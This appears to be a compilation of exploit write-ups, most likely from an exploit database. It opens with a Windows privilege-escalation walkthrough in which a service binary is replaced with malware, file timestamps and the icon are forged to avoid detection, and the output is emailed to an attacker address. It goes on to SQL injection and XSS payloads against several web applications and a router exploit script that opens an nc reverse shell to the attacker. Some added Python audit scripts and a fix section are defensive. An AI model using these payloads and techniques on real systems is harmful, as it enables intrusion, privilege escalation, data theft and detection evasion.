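# replacing or deleting files, or rewriting the DACL / owner.
WRITE_RIGHTS = {"F", "M", "W", "D", "DE", "WD", "AD", "WDAC", "WO", "DC", "GW", "GA"}

# Constructed sample: the BIN listing from the write-up, shortened.
SAMPLE = r"""
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                            DeepSecLab\psacln:(I)(OI)(CI)(N)
                            BUILTIN\Administrators:(I)(F)
                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                            NT SERVICE\TrustedInstaller:(I)(CI)(F)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                            BUILTIN\Users:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(text):
    """Yield (path, principal, flags, rights) for each ACE in icacls output.

    icacls prints the path and the first ACE on one line separated only by a
    space, and the path itself may contain spaces; this splits at the last
    space, which is correct as long as the first principal has no space in it.
    """
    path = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        m = ACE_RE.match(line)
        if m is None:                       # first line: "<path> <ace>"
            path, _, ace = line.rpartition(" ")
            m = ACE_RE.match(ace)
            if m is None:
                continue                    # not an ACE line; skip it
        parts = re.findall(r"\(([^)]*)\)", m.group("perms"))
        *flags, rights = parts              # last group is the rights list
        yield path, m.group("principal"), set(flags), set(rights.split(","))


def risky_aces(text):
    """Return ACEs that grant write-class rights to a low-privileged principal.

    Each hit is (path, principal, sorted rights, inherited). An explicit ACE
    (no (I) flag) on a subdirectory, like the Everyone:(OI)(CI)(F) entry in the
    sample, is exactly how a BIN directory ends up writable while its parent
    is not.
    """
    hits = []
    for path, principal, flags, rights in parse_icacls(text):
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            hits.append((path, principal, sorted(rights), "I" in flags))
    return hits


if __name__ == "__main__":
    for path, principal, rights, inherited in risky_aces(SAMPLE):
        print("%s: %s has %s (%s)" % (path, principal, ",".join(rights),
                                      "inherited" if inherited else "explicit"))
```

Run against the directories of every service ImagePath, this finds the same class of misconfiguration PrivescCheck reports; the fix is to remove the explicit Everyone ACE so the directory inherits the parent's restrictive DACL.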
							
# ==================================================================================================================
													 
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

 __PATH                                                                                                                                                                                                                                                                                                               

 \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                   

 \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
                                                                                      root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID    Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16
 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* We understand that the "EmailAgent.exe" program was installed by the Administrator and that its owner is the Administrator user.

# ==================================================================================================================

* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.

[+] C:\PenTest>whoami
  DeepSecLab\Hacker

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F

  processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
  Successfully processed 1 files; Failed processing 0 files
  
* OK. All commands completed successfully. We now have full privileges on this directory.
  
# ==================================================================================================================

* Now we will modify the EmailAgent file and inject self-written malware.
* We will be careful not to damage any files while doing this, so that all operations can be easily undone.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+]  C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  13.04.2023  22:00            12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
			   
# ==================================================================================================================

* We now set the Last Modified Date, Creation Date and Last Accessed Date.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* Next, we extract the real EmailAgent.exe file icon and apply it to the exploit. This way, we make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can also be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  24.09.2003  09:21            12.288 EmailAgent.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
			   
  [24.09.2003  09:21]            12.288 EmailAgent.exe
  [24.09.2003  09:21]           167.936 Null.EmailAgent.exe
  
* And time manipulation is over. They look like they were uploaded at the same time long ago.

# ==================================================================================================================

* Now we check the ownership of my malware.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

  __PATH                                                                                                                                                                                                                                                                                                                                                                                                                                            

  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                                                                                                                                                

  \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"                                                     root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID    Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28
  
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name

    Name                  

    DeepSecLab\Hacker  

   EmailAgent.exe Owner: DeepSecLab\Hacker

# =================================================================================================================#
#                                                                                                                  #
####################################################################################################################
#                                               #[EmailAgent.cs]#                                                  #
####################################################################################################################
#                                                                                                                  # 
                                                                                                                   #
* We program this malware in such a way that when the server is rebooted (when the services are restarted),        #
* It will be triggered and execute the codes we want,                                                              #
* And then send a printout of all this to the email address we specified.                                          #
                                                                                                                   #
 using System;                                                                                                     #
 using System.Linq;                                                                                                #
 using System.Text;                                                                                                #
 using System.Diagnostics;                                                                                         #
 using System.IO;                                                                                                  #
 using System.Collections;                                                                                         #
                                                                                                                   #
 namespace CliToolSpace   // Cli is the author's own helper class; its source is not shown on this page            #
 {                                                                                                                 #
     class _Main                                                                                                   #
     {                                                                                                             #
         static void Main(string[] args)                                                                           #
         {                                                                                                         #
             Cli commandLine = new Cli();                                                                          #
             commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");                         #
             commandLine.Execute();                                                                                #
             commandLine.ToFile(@"C:\Windows\Temp\");                                                              #
         }                                                                                                         #
     }                                                                                                             #
 }                                                                                                                 #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                 #[Mail.cs]#                                                      #
####################################################################################################################
#                                                                                                                  #
                                                                                                                   #
 using System;                                                                                                     #
 using System.Net.Mail;                                                                                            #
 using System.Net;                                                                                                 #
 SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");                                                    #
 var mail = new MailMessage();                                                                                     #
 mail.From = new MailAddress("mail@deepseclab.com");                                                               #
 mail.To.Add("mail@hacker.com");                                                                                   #
 mail.Subject = "Trigger Successful!";                                                                             #
 mail.IsBodyHtml = true;                                                                                           #
 string htmlBody;                                                                                                  #
 htmlBody = "<strong>This server has been rebooted.</strong>";                                                     #
 mail.Body = htmlBody;                                                                                             #
 Attachment attachment;                                                                                            #
 attachment = new Attachment(@"C:\Windows\Temp\Export.txt");                                                       #
 mail.Attachments.Add(attachment);                                                                                 #
 SmtpServer.Port = 587;                                                                                            #
 SmtpServer.UseDefaultCredentials = false;                                                                         #
 SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123");                   #
 SmtpServer.EnableSsl = true;                                                                                      #
 SmtpServer.Timeout = int.MaxValue;                                                                                #
 SmtpServer.Send(mail);                                                                                            #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                 #[Run.bat]#                                                      #
####################################################################################################################
#                                                                                                                  #
                                                                                                                   #
  whoami > C:\Windows\Temp\Export.txt                                                                              #
  cd C:\Program Files (x86)\Persits Software\AspEmail\Bin                                                          #
  del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe                                                      #
  cd c:\Windows\Tasks                                                                                              #
  del Run.bat & del Mail.exe                                                                                       #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                                                                                  #
                                             [+]Trigger Successful![+]                                             #
#                                                                                                                  #
[+] C:\PenTest>systeminfo | findstr "Boot Time"                                                                    #
  System Boot Time:          13.04.2022, 07:46:06                                                                  #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
                                                  #[Export.txt]#                                                   #
####################################################################################################################
#                                                                                                                  #
                                                                                                                   #
                                                NT AUTHORITY\SYSTEM				                   #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                                                                                  #
# ==================================================================================================================
#                                                   ...|||[FIX]|||...                                              #
# ==================================================================================================================
#                                [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+]                     #
# =================================================================================================================#

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
  [SC] QueryServiceConfig SUCCESS

  SERVICE_Name: Persits Software EmailAgent
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_Name   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_Name       : Persits Software EmailAgent
          DEPENDENCIES       : rpcss
          SERVICE_START_Name : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"

    D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

  Accesschk v6.15 - Reports effective permissions for securable objects
  Copyright (C) 2006-2022 Mark Russinovich
  Sysinternals - www.sysinternals.com

  Persits Software EmailAgent
    Medium Mandatory Level (Default) [No-Write-Up]
    RW NT AUTHORITY\SYSTEM
          SERVICE_ALL_ACCESS
    RW BUILTIN\Administrators
          SERVICE_ALL_ACCESS
		
# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

  Successfully processed 0 files; Failed processing 1 files
  C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

                                            DONE!

# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"

[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These commands are optional. They stop and restart the "Persits Software EmailAgent" service so that it runs with the corrected permissions; since the directory ACLs were already reset above, this step is no longer strictly necessary.
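An added check, not part of the writeup above, that parses the DACL printed by `sc sdshow` and reports which non-admin principals hold rights that would let them take over the service object itself (change its binary path, rewrite its DACL, or take ownership). Run against the DACL shown above it reports nothing: only SYSTEM and Administrators hold SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER, which is why the weakness on this host was the writable binary directory rather than the service object. The second SDDL string is a constructed example of a misconfigured service, and the rights table is the standard SDDL-to-service-right mapping, not something taken from this page.

```python
import re

# Service-specific access rights as encoded in SDDL ACE strings (two-letter codes).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",
    "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",
    "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE",
    "RC": "READ_CONTROL",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
}

# Rights that let a principal take over the service object: repoint the binary path,
# rewrite the DACL, or take ownership (and then do either of the former).
TAKEOVER_RIGHTS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}

# Principals expected to hold full control over a service.
TRUSTED_SIDS = {"SY", "BA"}

# One ACE: (type;flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# The DACL printed by `sc sdshow "Persits Software EmailAgent"` on this page.
PAGE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

# Constructed example: a service whose DACL hands Authenticated Users (AU) full control.
WEAK_SDDL = "D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"


def parse_dacl(sddl):
    """Return [(ace_type, sid, set_of_right_names)] for the DACL of an `sc sdshow` string."""
    dacl = sddl.split("S:", 1)[0]          # the SACL only audits; access is granted by the DACL
    if dacl.startswith("D:"):
        dacl = dacl[2:]
    aces = []
    for match in ACE_RE.finditer(dacl):
        ace_type, _flags, rights, _obj, _inherit_obj, sid = match.groups()
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]   # "CCLCSW..." -> CC, LC, SW, ...
        names = {SERVICE_RIGHTS.get(code, code) for code in codes}
        aces.append((ace_type, sid, names))
    return aces


def weak_grants(sddl):
    """Map each non-trusted SID to the takeover rights an allow ACE grants it (empty dict = clean)."""
    findings = {}
    for ace_type, sid, rights in parse_dacl(sddl):
        if ace_type != "A" or sid in TRUSTED_SIDS:
            continue
        hit = rights & TAKEOVER_RIGHTS
        if hit:
            findings[sid] = sorted(hit)
    return findings


if __name__ == "__main__":
    for label, sddl in (("page DACL", PAGE_SDDL), ("constructed weak DACL", WEAK_SDDL)):
        print(label, "->", weak_grants(sddl) or "no takeover rights for non-admin SIDs")
```

To audit a live host, paste the output of `sc sdshow <service>` into `weak_grants`; a clean result means the next thing to check is the file and directory ACLs of BINARY_PATH_NAME, as the `icacls` and `accesschk64.exe -wuvc` calls above do.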

# ==================================================================================================================
            
ASPapp Multiple Vulnerabilities

Vendor: ASPapp.com
Product: ASPapp
Version: Multiple Products
Website: http://www.aspapp.com/

BID: 9250 

Description:
A complete, easy-to-modify .asp portal system. With this portal you can manage users, content, links, files, forums, surveys, product catalog, shopping cart, PayPal or Authorize.net e-commerce, classifieds, calendar, downloads, images, surveys, faq's, news, and more. Currently it is one of the most popular .ASP scripts at HotScripts.com The below vulnerabilities also affect IntranetApp and ProjectApp, as the codebase is almost identical. 

Privilege Escalation Vulnerability:
When registering an account, a malicious user can set themselves to any user level they desire. The user level is determined by a hidden form field named "accesslevel". If a user sets themselves to the "Super Admin" level [4] they can take over the entire portal. They can also view other users' passwords in plaintext via the "User Admin" feature by viewing the HTML source. This does not seem to be present in IntranetApp, but is present in PortalApp and ProjectApp. 

Account Hijacking Vulnerability:
Once again ASP App software relies on hidden form fields to determine user values. By changing the "user_id" field when editing their profile a malicious user can reset passwords for arbitrary accounts and edit their user info etc. This is present in all three applications. 

Cross Site Scripting:
XSS is possible on any page of an ASP APP Portal by appending the variable "msg" with a value of any script you would like to be run. This vulnerability also exists in all 3 applications. 

Code Injection Vulnerabilities:
There are a number of places to inject code and have it run by a user or an admin. These include, but are not limited to, the following.

forums.asp: when posting a new message, script can be injected into the Title and message form fields. This is especially dangerous because the latest messages are shown on the main page of the website, therefore affecting all users.

submit.asp: a malicious user can submit script instead of a link to be added to the website. This affects the administrator when he prepares to accept or deny submissions.

upd_user.asp (the profile update form): script submitted in the form fields is run whenever someone views the affected profile (user_public.asp). The vulnerable form fields are First Name, Last Name and Country.

These vulnerabilities exist in all three of the previously mentioned ASP APP scripts. 

Plaintext Password Storage Weakness:
The username and password for the logged in user are stored as plaintext in the cookie, making cookie theft through an xss vuln even more dangerous. Also, a malicious admin can view a users password in plaintext by visiting the user administration page, and viewing the HTML source of a user. The users password will then be presented in plaintext. This vuln exists in all three of the previously mentioned ASP APP scripts. 

Solution:
The vendor plans on releasing a new version of these products at the end of the month to supposedly correct all of the security issues mentioned above. 

Credits:
James Bercegay And parag0d of the GulfTech Security Research Team.
            
# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaSoft Pro
# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/
# Version: v1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'query' parameter. You can use the GET or POST
methods.
====================================================

# PoC : SQLi :

# GET : http://test.com/search?query=[SQL]
# POST : http://test.com/search
POST /search HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.com/login
Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o; __RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

Query=test


# Vulnerable Payload :

Parameter: query (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: query=test%' AND 3923=3923 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: query=test%' AND 1603 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1603=1603) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='


====================================================
            
source: https://www.securityfocus.com/bid/49667/info

ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin 
            
----------------------------------------------------------------------------------------------------------
# Exploit Title:   ASLDRService ATK Hotkey- Privilege Escalation Unquoted Service Path
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version:  1.0.69.0
# Tested on: Windows 7 x64 SP1 (but it should work on all Windows versions)
 
The application suffers from an unquoted service path issue affecting the service 'ASLDRService', deployed as part of ATK Hotkey.
This could allow an authorized but non-privileged local user to execute arbitrary code with SYSTEM privileges on the system.
 
POC :
 
 
C:\Users\Utilisateur>sc qc ASLDRService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ASLDRService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
        LOAD_ORDER_GROUP   : ShellSvcGroup
        TAG                : 0
        DISPLAY_NAME       : ASLDR Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


Additional notes :

https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
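An added example, not part of the advisory, that parses the `sc qc` output shown above and lists the paths Windows tries before the real binary when the path is unquoted and contains spaces. The `sc qc` text is copied from this advisory and, for contrast, from the Persits EmailAgent section earlier on the page, whose quoted path yields no candidates. Whether any candidate's parent directory is writable still has to be checked with icacls or accesschk, as that section does; this script only derives where to look.

```python
import re

# `sc qc ASLDRService` as printed in the advisory above.
ASLDR_SC_QC = r"""
SERVICE_NAME: ASLDRService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
        LOAD_ORDER_GROUP   : ShellSvcGroup
        TAG                : 0
        DISPLAY_NAME       : ASLDR Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# The quoted path from the Persits EmailAgent section of this page (field labels as printed there).
PERSITS_SC_QC = r"""
SERVICE_Name: Persits Software EmailAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_Name   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
        SERVICE_START_Name : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Za-z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Turn `sc qc` output into {FIELD: value}; field names are upper-cased to absorb label variants."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).upper()] = m.group(2)
    return fields


def hijack_candidates(binary_path):
    """Paths CreateProcess tries, in order, before the intended executable.

    For an unquoted path, the prefix before each space is tried as the program name and
    Windows appends ".exe" when that prefix has no extension. A quoted path yields nothing.
    """
    cmd = binary_path.strip()
    if cmd.startswith('"') or " " not in cmd:
        return []
    return [cmd[:i] + ".exe" for i, ch in enumerate(cmd) if ch == " "]


def audit(sc_qc_text):
    """Summarise the exposure: who the service runs as, whether it auto-starts, and where to plant a binary."""
    f = parse_sc_qc(sc_qc_text)
    return {
        "service": f.get("SERVICE_NAME", ""),
        "runs_as_system": f.get("SERVICE_START_NAME", "") == "LocalSystem",
        "auto_start": "AUTO_START" in f.get("START_TYPE", ""),
        "candidates": hijack_candidates(f.get("BINARY_PATH_NAME", "")),
    }


if __name__ == "__main__":
    for text in (ASLDR_SC_QC, PERSITS_SC_QC):
        report = audit(text)
        print(report["service"], "SYSTEM" if report["runs_as_system"] else "", "auto" if report["auto_start"] else "")
        for path in report["candidates"]:
            print("   would try:", path)
```

On a real host feed it `subprocess.run(["sc", "qc", name], capture_output=True, text=True).stdout` for each service name from `sc query`; the interesting findings are candidates whose directory is writable by non-admins, since an auto-start LocalSystem service then executes the planted file on the next boot.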
            
# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
# Date: 07-12-2022
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.askey.com
# Platform: ASKEY router devices RTF3505VW-N1
# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md

#Description:
#----------

# Mitrastar ASKEY RTF3505VW-N1 devices provide SSH access into a restricted default shell (the credentials are printed on the back of the router, and in some cases these routers use default credentials).

# The command "tcpdump" is present in the restricted shell and does not handle the -z flag correctly, so it can be used to escalate privileges: tcpdump is told to write a capture file in the router's /tmp directory and to run "-z sh" on it, while packets containing the string ";/bin/bash" are injected through port 80 (used by the router's Web GUI) so that the string lands in the file that "sh" then executes. Using ";/bin/bash" as the injected string spawns a busybox/ash console.

#Exploit:
#--------
#!/usr/bin/bash

if [ "$#" -lt 5 ]; then 
	echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
	exit 0
fi

for K in $(seq 1 15) 	# Attempts
do

echo "**************************************************************************************"
echo "******************************** Attempt number $K ************************************"
echo "**************************************************************************************"

for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 &	# start a background loop injecting the string ";/bin/bash" on the port 80 of the router

# Expect script to interact with the router over SSH: log in, launch tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
/usr/bin/expect << EOD
	spawn ssh $2@$1
	expect 	{
		"password: " {
		send "$3\r"
		expect ">"
		send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r"		# filter by source port 8888
		}
		"yes/no" {
		send "yes\r"
		#exp_continue
		}
	}
	set timeout 2
	expect 	{
    		timeout {
        	puts "Timeout..."
        	send "exit\r"
        	exit 0
	    	}

		"*usy*ox" {
	        expect "#"
	        send "rm /tmp/runme* \r"
		send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
	        puts "Rooted !!!!!!!!!"
	        set timeout -1
	        expect "NEVER_APPEARING_STRING#"            # wait indefinitely to keep the reverse shell open
		}
	}
EOD

done
            
# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/
# Tested Version: 3.0.5
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Cross Site Scripting:

# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]
# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>

# SQL Injection:

# http://localhost/[PATH]/list-details.php?view=[SQL]
            
# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 03.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php?cat=1&exp=&shop=1
Vulnerable Parameter: shop (GET)
Payload: cat=1&exp=&shop=-5438') UNION ALL SELECT CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL-- fmIb
            
# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Latest
# Tested on: Ubuntu-trusty-64
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MGvE)
            
source: https://www.securityfocus.com/bid/50616/info

AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.

Versions prior to AShop 5.1.4 are vulnerable. 

IE8

